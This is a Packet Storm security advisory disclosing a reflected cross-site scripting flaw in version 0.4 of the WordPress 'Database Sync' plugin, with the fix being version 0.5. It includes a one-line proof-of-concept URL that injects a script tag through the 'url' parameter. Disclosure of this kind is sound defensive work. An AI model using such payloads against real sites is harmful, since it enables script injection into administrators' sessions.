WordPress Database Sync 0.4 Cross Site Scripting

2015-07-30T00:00:00
ID PACKETSTORM:132907
Type packetstorm
Reporter Morten Nortoft
Modified 2015-07-30T00:00:00

Description

                                        
                                            `Title: WordPress 'Database Sync' Plugin   
Version: 0.4  
Author: Morten Nørtoft, Kenneth Jepsen & Mikkel Vej  
Download:   
- https://wordpress.org/plugins/database-sync/  
- https://plugins.svn.wordpress.org/database-sync/  
==========================================================  
  
## Plugin description  
==========================================================  
Sync databases across servers with a single click.  
  
## Vulnerabilities  
==========================================================  
The GET parameter 'url' is printed directly to the page without sanitization making XSS possible.  
  
PoC:  
Log in as admin and visit the following URL:  
[URL]/wp-admin/tools.php?page=dbs_options&dbs_action=sync&url="><script>alert(1)</script>  
  
  
## Solution  
==========================================================  
Update to v.0.5.  
  
==========================================================  
Vulnerabilities found using Eir; an early stage static vulnerability scanner for PHP applications.  
`